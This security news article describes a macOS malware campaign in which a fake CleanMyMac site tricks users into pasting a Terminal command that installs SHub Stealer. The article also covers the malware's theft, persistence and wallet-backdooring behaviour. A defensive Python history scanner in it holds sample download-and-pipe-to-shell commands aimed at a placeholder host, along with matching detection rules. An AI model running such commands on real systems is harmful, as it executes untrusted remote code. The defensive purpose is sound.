A phony CleanMyMac website is being used by a new macOS malware campaign to trick users into infecting their own computers. Rather than offering a standard app download, the website instructs users to open Terminal and paste a command.
That command silently installs the SHub Stealer malware family, which targets passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and messaging sessions. Neither MacPaw nor the authentic CleanMyMac product is associated with the fraudulent website. Its primary trick is straightforward but powerful: it presents the installation procedure as a sophisticated choice for seasoned users. Once the victim pastes the command, it prints a seemingly authentic message, decodes a hidden link, downloads a shell script from an attacker-controlled server, and immediately executes it via zsh.
Many macOS safeguards, including Gatekeeper and notarization checks, are largely circumvented because the user executes the command voluntarily, according to Malwarebytes.

Data Theft and ClickFix Delivery

This attack employs a technique called ClickFix, in which the victim is tricked into manually executing malware. Once launched, the first-stage loader examines the device before proceeding.
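The delivery chain described above leaves a trace in the victim's shell history: a single pasted line that decodes or downloads content and pipes it straight into a shell. The following scanner is an added, defender-side example (not code from the Malwarebytes report) that flags that pattern in zsh or bash history; the sample history lines are constructed, with a placeholder domain and a harmless base64 string.

```python
import re

# Constructed sample history (not real campaign artifacts). Line 2 uses the
# zsh EXTENDED_HISTORY prefix ": <epoch>:<duration>;"; the base64 on line 4
# decodes to the harmless string "echo hello".
SAMPLE_HISTORY = """\
ls -la ~/Downloads
: 1700000000:0;curl -fsSL https://example.invalid/install.sh | zsh
brew update
echo ZWNobyBoZWxsbw== | base64 -d | zsh
git status
"""

# zsh extended history: ": 1700000000:0;<command>"
ZSH_EXT = re.compile(r"^:\s*\d+:\d+;(.*)$")

# A trailing "| sh", "| zsh", "| bash" (optionally /bin/-prefixed).
PIPE_TO_SHELL = r"\|\s*(?:/bin/)?(?:bash|zsh|sh)\b"

RULES = {
    # download-and-run: curl/wget output piped into a shell
    "download_pipe_shell": re.compile(r"\b(?:curl|wget)\b.*" + PIPE_TO_SHELL),
    # decode-and-run: base64 decode output piped into a shell
    "decode_pipe_shell": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b.*" + PIPE_TO_SHELL),
}


def normalize(raw):
    """Strip the zsh EXTENDED_HISTORY prefix if present and trim whitespace."""
    raw = raw.strip()
    m = ZSH_EXT.match(raw)
    return m.group(1).strip() if m else raw


def scan_history(text):
    """Return (line_number, [rule names], command) for each suspicious line."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        cmd = normalize(raw)
        if not cmd:
            continue
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            findings.append((lineno, hits, cmd))
    return findings


if __name__ == "__main__":
    for lineno, hits, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {', '.join(hits)}: {cmd}")
```

On a real Mac the same function can be pointed at ~/.zsh_history or ~/.bash_history; a hit is a triage lead, not proof of compromise, since administrators also pipe installers into shells.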
[Figure: Crypto wallets are the target of SHub (Source: Malwarebytes)]

One preliminary check looks for a Russian-language Mac keyboard. If one is discovered, the malware halts and notifies its server of the occurrence. This type of geofencing is common in malware associated with Russian-speaking cybercriminals, who frequently avoid infecting systems within their own region.
If the target passes the check, the malware transmits system information to its command-and-control server, including the external IP address, hostname, macOS version, and keyboard locale. The main AppleScript payload is then downloaded, the Terminal window is closed to conceal the attack, and a phony System Preferences password prompt is displayed. If the user enters the correct macOS password, SHub gains access to the Keychain, which holds private keys, tokens, Wi-Fi credentials, and saved passwords.
The malware then collects data from Chromium-based browsers, Firefox, Safari, Telegram, Apple Notes, iCloud data, shell history files, and developer configuration files.
Additionally, it searches for local wallet apps and browser extensions for cryptocurrency wallets, such as Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, and Trezor Suite.

Persistence and Wallet Hijacking

SHub is more than just theft. If it finds certain wallet apps, it can substitute backdoored versions of their core logic files.
The purpose of these altered apps is to steal seed phrases and wallet passwords the next time the user unlocks the wallet or goes through a phony recovery process. To stay persistent and receive remote commands, the malware also installs a phony Google Keystone LaunchAgent. The campaign demonstrates the increasing sophistication of macOS threats. Legitimate apps seldom require users to paste installation commands into Terminal, which remains a clear warning sign.